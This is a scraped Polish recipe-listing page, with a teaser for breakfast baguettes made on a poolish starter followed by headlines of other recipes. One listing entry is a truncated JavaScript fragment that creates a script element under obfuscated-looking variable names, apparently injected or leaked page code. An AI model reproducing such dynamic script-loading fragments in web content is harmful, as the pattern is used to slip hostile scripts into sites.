Bagietki śniadaniowe
Źródło: https://sprawdzonakuchnia.pl/bagietki-sniadaniowe/
Bagietki śniadaniowe na zaczynie drożdżowym zwanym poolish. Poolish przygotowujemy zawsze z równych proporcji mąki i wody ze szczyptą drożdży, aby był pełnowartościowy, potrzebuje około 12 godzin w ciepłym miejscu. Zaczyn w tym czasie rośnie, a na powierzchni pojawia się mnóstwo pęcherzyków powietrza. Należy pamiętać, aby poolish nie czekał zbyt długo, jeśli zacznie opadać i tracić pęcherzyki powietrza, zrezygnowałabym... Read More Artykuł Bagietki...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 15
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 24
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 23
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 23
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 13
Przepisy z bloga
A więc jesień! Pełne słońca wspomnienia z wakacyjnych... ⇖ 100
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 124
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 228
Makaron udon jest to jeden z moich ulubionych makaronów.... ⇖ 273
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 356
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 262
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 210
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 181
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 169
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 151
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 69
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 65









































